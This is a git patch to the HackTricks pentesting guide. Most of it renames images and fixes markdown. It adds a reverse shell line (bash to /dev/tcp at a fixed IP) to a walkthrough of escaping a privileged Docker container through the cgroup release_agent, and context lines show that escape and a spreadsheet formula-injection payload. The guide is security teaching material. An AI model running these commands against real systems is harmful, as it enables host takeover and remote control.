From 96d7f39ffb56379f5a8d5b7e202778310d14ae92 Mon Sep 17 00:00:00 2001 
From: CPol Date: Tue, 15 Dec 2020 09:03:34 +0000 Subject: [PATCH] GitBook: [master] 9 pages and 27 assets modified --- .../assets/{1 (2).png => 1 (2) (1) (1).png} | Bin ...6e67655f696d672e706e67 (6) (4) (6) (1).png | Bin 0 -> 1502 bytes ...2) (1).png => image (107) (2) (2) (1).png} | Bin ...7) (2).png => image (107) (2) (2) (2).png} | Bin ...1) (1).png => image (121) (1) (1) (1).png} | Bin .../{image (343).png => image (207) (2).png} | Bin ...7) (1).png => image (227) (1) (1) (1).png} | Bin .../{image (61).png => image (25) (1).png} | Bin .../{image (67).png => image (25) (2).png} | Bin .../{image (172).png => image (253) (1).png} | Bin ...4) (1).png => image (254) (1) (1) (1).png} | Bin ...2) (1).png => image (345) (2) (2) (1).png} | Bin ...5) (2).png => image (345) (2) (2) (2).png} | Bin .../{image (73).png => image (95) (1).png} | Bin 1911-pentesting-fox.md | 2 +- README.md | 14 +++++------ .../escaping-from-a-docker-container.md | 22 +++++++++++------- .../exploiting-content-providers.md | 4 ++-- pentesting-web/formula-injection.md | 2 +- pentesting/pentesting-web/drupal.md | 2 +- pentesting/pentesting-web/wordpress.md | 2 +- reversing/cryptographic-algorithms/README.md | 4 ++-- ...rivileged-accounts-and-token-privileges.md | 2 +- 23 files changed, 29 insertions(+), 25 deletions(-) rename .gitbook/assets/{1 (2).png => 1 (2) (1) (1).png} (100%) create mode 100644 .gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (6) (1).png rename .gitbook/assets/{image (107) (2) (1).png => image (107) (2) (2) (1).png} (100%) rename .gitbook/assets/{image (107) (2).png => image (107) (2) (2) (2).png} (100%) rename .gitbook/assets/{image (121) (1).png => image (121) (1) (1) (1).png} (100%) rename .gitbook/assets/{image (343).png => image (207) (2).png} (100%) rename .gitbook/assets/{image (227) (1).png => image (227) (1) (1) (1).png} (100%) rename .gitbook/assets/{image 
(61).png => image (25) (1).png} (100%) rename .gitbook/assets/{image (67).png => image (25) (2).png} (100%) rename .gitbook/assets/{image (172).png => image (253) (1).png} (100%) rename .gitbook/assets/{image (254) (1).png => image (254) (1) (1) (1).png} (100%) rename .gitbook/assets/{image (345) (2) (1).png => image (345) (2) (2) (1).png} (100%) rename .gitbook/assets/{image (345) (2).png => image (345) (2) (2) (2).png} (100%) rename .gitbook/assets/{image (73).png => image (95) (1).png} (100%) diff --git a/.gitbook/assets/1 (2).png b/.gitbook/assets/1 (2) (1) (1).png similarity index 100% rename from .gitbook/assets/1 (2).png rename to .gitbook/assets/1 (2) (1) (1).png diff --git a/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (6) (1).png b/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (6) (1).png new file mode 100644 index 0000000000000000000000000000000000000000..4c4968b48f0ebf20a73e46cd07c9315dc629c00c GIT binary patch literal 1502 zcmV<41tI#0P)O}P0RNd|v9YnQudnZ?9RH*M z|B+Y!p8)@kQ~!)n|BO%nn*jfdPXCHc|A|chiA(>8O82_ME`?B|ARvR zf5yUXqm38Abi#$x94+_wSpM&m`*Z*GIHFl|p&O65#5k%QvJu2Y>v!(8I?EcNQZGLg~u( zv^h#zNhUuw>eb0)vL$Kn+gBEP^N0JRA$h;q;whs#8mWb2qi#)Zd^(YIe>y^a`_XhX z1bp3CPTLQ1q7<>mM!huo?Bj`~dwZ`gP(S!{=Lo8#cziqP;&YNE9$6TOQawbVjh&S|SSUIvc>`V@ND4iwhrCk_rd{R$*KSDKnf*tjSm09Qp;n+!g0?1?l!iD*as#*m zFr7LB^JMV=6#Y%WKvZi0sN;YdB-H>h0fd!ib#wOK#gVr6$Edw(IV#l{6_k?7AaNsb`N5=vr;YmR}c{fmsWy|;K$fpN}4G(>rv z42{$o%6Za}h5iAO)k$-YYq97tA)A)DH({exg@A1k5z&s3zQ19N+4OBRM4YJ@&q-2wUkl| zQ7Qq`s?RddD%9J%W7OGKy0Ud`Zq-pzmy_em`J>Y5s zrqQenSPoR1HAcEk|vu zPWtV;;jDV=r|HVWGnr==Fl~~$x^9nEtwc|O>kLv`HJy~|I<2Z#9YLBt7*OANbZ_NE z9&1llYdKZOq+)$8>i)c{+FLnKee&Oe&VX0F z^gXB22=cwBo`^L@No`!x7+I(G+B!8Y*Qgb|HVyWF0T{|tnTG-h82|tP07*qoM6N<$ Ef}*3!D*ylh literal 0 HcmV?d00001 
diff --git a/.gitbook/assets/image (107) (2) (1).png b/.gitbook/assets/image (107) (2) (2) (1).png
similarity index 100%
rename from .gitbook/assets/image (107) (2) (1).png
rename to .gitbook/assets/image (107) (2) (2) (1).png
diff --git a/.gitbook/assets/image (107) (2).png b/.gitbook/assets/image (107) (2) (2) (2).png
similarity index 100%
rename from .gitbook/assets/image (107) (2).png
rename to .gitbook/assets/image (107) (2) (2) (2).png
diff --git a/.gitbook/assets/image (121) (1).png b/.gitbook/assets/image (121) (1) (1) (1).png
similarity index 100%
rename from .gitbook/assets/image (121) (1).png
rename to .gitbook/assets/image (121) (1) (1) (1).png
diff --git a/.gitbook/assets/image (343).png b/.gitbook/assets/image (207) (2).png
similarity index 100%
rename from .gitbook/assets/image (343).png
rename to .gitbook/assets/image (207) (2).png
diff --git a/.gitbook/assets/image (227) (1).png b/.gitbook/assets/image (227) (1) (1) (1).png
similarity index 100%
rename from .gitbook/assets/image (227) (1).png
rename to .gitbook/assets/image (227) (1) (1) (1).png
diff --git a/.gitbook/assets/image (61).png b/.gitbook/assets/image (25) (1).png
similarity index 100%
rename from .gitbook/assets/image (61).png
rename to .gitbook/assets/image (25) (1).png
diff --git a/.gitbook/assets/image (67).png b/.gitbook/assets/image (25) (2).png
similarity index 100%
rename from .gitbook/assets/image (67).png
rename to .gitbook/assets/image (25) (2).png
diff --git a/.gitbook/assets/image (172).png b/.gitbook/assets/image (253) (1).png
similarity index 100%
rename from .gitbook/assets/image (172).png
rename to .gitbook/assets/image (253) (1).png
diff --git a/.gitbook/assets/image (254) (1).png b/.gitbook/assets/image (254) (1) (1) (1).png
similarity index 100%
rename from .gitbook/assets/image (254) (1).png
rename to .gitbook/assets/image (254) (1) (1) (1).png
diff --git a/.gitbook/assets/image (345) (2) (1).png b/.gitbook/assets/image (345) (2) (2) (1).png
similarity index 100%
rename from .gitbook/assets/image (345) (2) (1).png
rename to .gitbook/assets/image (345) (2) (2) (1).png
diff --git a/.gitbook/assets/image (345) (2).png b/.gitbook/assets/image (345) (2) (2) (2).png
similarity index 100%
rename from .gitbook/assets/image (345) (2).png
rename to .gitbook/assets/image (345) (2) (2) (2).png
diff --git a/.gitbook/assets/image (73).png b/.gitbook/assets/image (95) (1).png
similarity index 100%
rename from .gitbook/assets/image (73).png
rename to .gitbook/assets/image (95) (1).png
diff --git a/1911-pentesting-fox.md b/1911-pentesting-fox.md
index 5864e38da..d817c8317 100644
--- a/1911-pentesting-fox.md
+++ b/1911-pentesting-fox.md
@@ -10,7 +10,7 @@ dht udp "DHT Nodes"
 ![](.gitbook/assets/image%20%28182%29.png)
-![](.gitbook/assets/image%20%28345%29%20%282%29%20%282%29.png)
+![](.gitbook/assets/image%20%28345%29%20%282%29%20%282%29%20%282%29.png)
 InfluxDB
diff --git a/README.md b/README.md
index e847ee72f..004886680 100644
--- a/README.md
+++ b/README.md
@@ -1,7 +1,5 @@
 # HackTricks
-
-
 ![](.gitbook/assets/portada-alcoholica.png)
 **Welcome to the page where you will find each trick/technique/whatever I have learnt in CTFs, real life apps and reading researches and news.**
@@ -14,14 +12,14 @@ Here you will find the **typical flow** that **you should follow when pentesting
 **Click in the title to start!**
-If you want to **know** about my **latest modifications**/**additions** or you have **any suggestion for HackTricks or PEASS**, ****join the [πŸ’¬](https://emojipedia.org/speech-balloon/) ****[**PEASS & HackTricks telegram group here**](https://t.me/peass), or **follow me on Twitter** [🐦](https://emojipedia.org/bird/)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
-If you want to **share some tricks with the community** you can also submit **pull requests** to ****[**https://github.com/carlospolop/hacktricks**](https://github.com/carlospolop/hacktricks) ****that will be reflected in this book.
-Don't forget to **give ⭐ on the github** to motivate me to continue developing this book.
-
-
+If you want to **know** about my **latest modifications**/**additions** or you have **any suggestion for HackTricks or PEASS**, **join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) ****[**PEASS & HackTricks telegram group here**](https://t.me/peass), or **follow me on Twitter** [🐦](https://emojipedia.org/bird/)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
+If you want to **share some tricks with the community** you can also submit **pull requests** to **\*\*\[**[https://github.com/carlospolop/hacktricks\*\*\]\(https://github.com/carlospolop/hacktricks](https://github.com/carlospolop/hacktricks**]%28https://github.com/carlospolop/hacktricks)\) **\*\*that will be reflected in this book.
+Don't forget to** give ⭐ on the github\*\* to motivate me to continue developing this book.
 ![](.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67%20%286%29%20%284%29%20%286%29.png)
 [**Buy me a coffee here**](https://www.buymeacoffee.com/carlospolop)\*\*\*\*
-Creative Commons License
Copyright Β© Carlos Polop 2020. Except where otherwise specified, the text on HACK TRICKS by Carlos Polop is licensed under the Creative Commons Attribution-ShareAlike License 4.0 (International) (CC-BY-SA 4.0).
+
+Copyright Β© Carlos Polop 2020. Except where otherwise specified, the text on [HACK TRICKS](https://github.com/carlospolop/hacktricks) by Carlos Polop is licensed under the [Creative Commons Attribution-ShareAlike License 4.0 \(International\) \(CC-BY-SA 4.0\)](https://creativecommons.org/licenses/by-sa/4.0/).
+
diff --git a/linux-unix/privilege-escalation/escaping-from-a-docker-container.md b/linux-unix/privilege-escalation/escaping-from-a-docker-container.md
index 77336660c..ea3594922 100644
--- a/linux-unix/privilege-escalation/escaping-from-a-docker-container.md
+++ b/linux-unix/privilege-escalation/escaping-from-a-docker-container.md
@@ -29,10 +29,17 @@ mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x
 echo 1 > /tmp/cgrp/x/notify_on_release
 host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
 echo "$host_path/cmd" > /tmp/cgrp/release_agent
-
+
+#For a normal PoC =================
 echo '#!/bin/sh' > /cmd
 echo "ps aux > $host_path/output" >> /cmd
 chmod a+x /cmd
+#===================================
+#Reverse shell
+echo '#!/bin/bash' > /cmd
+echo "bash -i >& /dev/tcp/10.10.14.21/9000 0>&1" >> /cmd
+chmod a+x /cmd
+#===================================
 sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
 head /output
@@ -58,7 +65,7 @@ A container would be vulnerable to this technique if run with the flags: `--secu
 Now that we understand the requirements to use this technique and have refined the proof of concept exploit, let’s walk through it line-by-line to demonstrate how it works.
-To trigger this exploit we need a cgroup where we can create a `release_agent` file _and_ trigger `release_agent` invocation by killing all processes in the cgroup. The easiest way to accomplish that is to mount a cgroup controller and create a child cgroup.
+To trigger this exploit we need a cgroup where we can create a `release_agent` file and trigger `release_agent` invocation by killing all processes in the cgroup. The easiest way to accomplish that is to mount a cgroup controller and create a child cgroup.
 To do that, we create a `/tmp/cgrp` directory, mount the [RDMA](https://www.kernel.org/doc/Documentation/cgroup-v1/rdma.txt) cgroup controller and create a child cgroup \(named β€œx” for the purposes of this example\). While every cgroup controller has not been tested, this technique should work with the majority of cgroup controllers.
@@ -68,7 +75,7 @@ Note that cgroup controllers are global resources that can be mounted multiple t
 We can see the β€œx” child cgroup creation and its directory listing below.
-```bash
+```text
 root@b11cf9eab4fd:/# mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x
 root@b11cf9eab4fd:/# ls /tmp/cgrp/
 cgroup.clone_children cgroup.procs cgroup.sane_behavior notify_on_release release_agent tasks x
@@ -82,7 +89,7 @@ The files we add or modify in the container are present on the host, and it is p
 Those operations can be seen below:
-```bash
+```text
 root@b11cf9eab4fd:/# echo 1 > /tmp/cgrp/x/notify_on_release
 root@b11cf9eab4fd:/# host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
 root@b11cf9eab4fd:/# echo "$host_path/cmd" > /tmp/cgrp/release_agent
@@ -90,14 +97,14 @@ root@b11cf9eab4fd:/# echo "$host_path/cmd" > /tmp/cgrp/release_agent
 Note the path to the `/cmd` script, which we are going to create on the host:
-```bash
+```text
 root@b11cf9eab4fd:/# cat /tmp/cgrp/release_agent
 /var/lib/docker/overlay2/7f4175c90af7c54c878ffc6726dcb125c416198a2955c70e186bf6a127c5622f/diff/cmd
 ```
 Now, we create the `/cmd` script such that it will execute the `ps aux` command and save its output into `/output` on the container by specifying the full path of the output file on the host. At the end, we also print the `/cmd` script to see its contents:
-```bash
+```text
 root@b11cf9eab4fd:/# echo '#!/bin/sh' > /cmd
 root@b11cf9eab4fd:/# echo "ps aux > $host_path/output" >> /cmd
 root@b11cf9eab4fd:/# chmod a+x /cmd
@@ -108,7 +115,7 @@ ps aux > /var/lib/docker/overlay2/7f4175c90af7c54c878ffc6726dcb125c416198a2955c7
 Finally, we can execute the attack by spawning a process that immediately ends inside the β€œx” child cgroup. By creating a `/bin/sh` process and writing its PID to the `cgroup.procs` file in β€œx” child cgroup directory, the script on the host will execute after `/bin/sh` exits. The output of `ps aux` performed on the host is then saved to the `/output` file inside the container:
-```bash
+```text
 root@b11cf9eab4fd:/# sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
 root@b11cf9eab4fd:/# head /output
 USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
@@ -121,7 +128,6 @@ root 8 0.0 0.0 0 0 ? I< 13:57 0:00 [mm_percpu_wq]
 root 9 0.0 0.0 0 0 ? S 13:57 0:00 [ksoftirqd/0]
 root 10 0.0 0.0 0 0 ? I 13:57 0:00 [rcu_sched]
 root 11 0.0 0.0 0 0 ? S 13:57 0:00 [migration/0]
-
 ```
 ## `--privileged` flag v2
diff --git a/mobile-apps-pentesting/android-app-pentesting/drozer-tutorial/exploiting-content-providers.md b/mobile-apps-pentesting/android-app-pentesting/drozer-tutorial/exploiting-content-providers.md
index 1cfb83f09..7479cb639 100644
--- a/mobile-apps-pentesting/android-app-pentesting/drozer-tutorial/exploiting-content-providers.md
+++ b/mobile-apps-pentesting/android-app-pentesting/drozer-tutorial/exploiting-content-providers.md
@@ -59,7 +59,7 @@ content://com.mwr.example.sieve.DBContentProvider/Passwords/
 You should also check the **ContentProvider code** to search for queries:
-![](../../../.gitbook/assets/image%20%28121%29%20%281%29%20%281%29.png)
+![](../../../.gitbook/assets/image%20%28121%29%20%281%29%20%281%29%20%281%29.png)
 Also, if you can't find full queries you could **check which names are declared by the ContentProvider** on the `onCreate` method:
@@ -76,7 +76,7 @@ When checking the code of the Content Provider **look** also for **functions** n
 ![](../../../.gitbook/assets/image%20%28211%29.png)
-![](../../../.gitbook/assets/image%20%28254%29%20%281%29%20%281%29.png)
+![](../../../.gitbook/assets/image%20%28254%29%20%281%29%20%281%29%20%281%29.png)
 Because you will be able to call them
diff --git a/pentesting-web/formula-injection.md b/pentesting-web/formula-injection.md
index 532e5ac56..b0c0c3fb7 100644
--- a/pentesting-web/formula-injection.md
+++ b/pentesting-web/formula-injection.md
@@ -41,5 +41,5 @@ The good news is that **this payload is executed automatically when the file is
 It's possible to execute a calculator with the following payload **`=cmd|' /C calc'!xxx`**
-![](../.gitbook/assets/image%20%2861%29.png)
+![](../.gitbook/assets/image%20%2825%29%20%281%29.png)
diff --git a/pentesting/pentesting-web/drupal.md b/pentesting/pentesting-web/drupal.md
index 93eb6726f..e494f17e6 100644
--- a/pentesting/pentesting-web/drupal.md
+++ b/pentesting/pentesting-web/drupal.md
@@ -24,7 +24,7 @@ Accessing _/user/<number>_ you can see the number of existing users, in th
 ![](../../.gitbook/assets/image%20%2826%29.png)
-![](../../.gitbook/assets/image%20%28227%29%20%281%29.png)
+![](../../.gitbook/assets/image%20%28227%29%20%281%29%20%281%29.png)
 ## Hidden pages enumeration
diff --git a/pentesting/pentesting-web/wordpress.md b/pentesting/pentesting-web/wordpress.md
index 919054def..549537803 100644
--- a/pentesting/pentesting-web/wordpress.md
+++ b/pentesting/pentesting-web/wordpress.md
@@ -183,7 +183,7 @@ It is recommended to disable Wp-Cron and create a real cronjob inside the host t
 ```
-![](../../.gitbook/assets/image%20%28107%29%20%282%29.png)
+![](../../.gitbook/assets/image%20%28107%29%20%282%29%20%282%29.png)
 ![](../../.gitbook/assets/image%20%28224%29.png)
diff --git a/reversing/cryptographic-algorithms/README.md b/reversing/cryptographic-algorithms/README.md
index 98ec86585..7c53b5e9d 100644
--- a/reversing/cryptographic-algorithms/README.md
+++ b/reversing/cryptographic-algorithms/README.md
@@ -145,7 +145,7 @@ You can identify both of them checking the constants. Note that the sha\_init ha
 Note the use of more constants
-![](../../.gitbook/assets/image%20%28172%29.png)
+![](../../.gitbook/assets/image%20%28253%29.png)
 ## CRC \(hash\)
@@ -177,7 +177,7 @@ A CRC hash algorithm looks like:
 The graph is quiet large:
-![](../../.gitbook/assets/image%20%28343%29.png)
+![](../../.gitbook/assets/image%20%28207%29%20%282%29.png)
 Check **3 comparisons to recognise it**:
diff --git a/windows/active-directory-methodology/privileged-accounts-and-token-privileges.md b/windows/active-directory-methodology/privileged-accounts-and-token-privileges.md
index de64c241d..b9b0802ac 100644
--- a/windows/active-directory-methodology/privileged-accounts-and-token-privileges.md
+++ b/windows/active-directory-methodology/privileged-accounts-and-token-privileges.md
@@ -37,7 +37,7 @@ If you don't want to wait an hour you can use a PS script to make the restore ha
 Note the spotless' user membership:
-![](../../.gitbook/assets/1%20%282%29%20%281%29.png)
+![](../../.gitbook/assets/1%20%282%29%20%281%29%20%281%29.png)
 However, we can still add new users: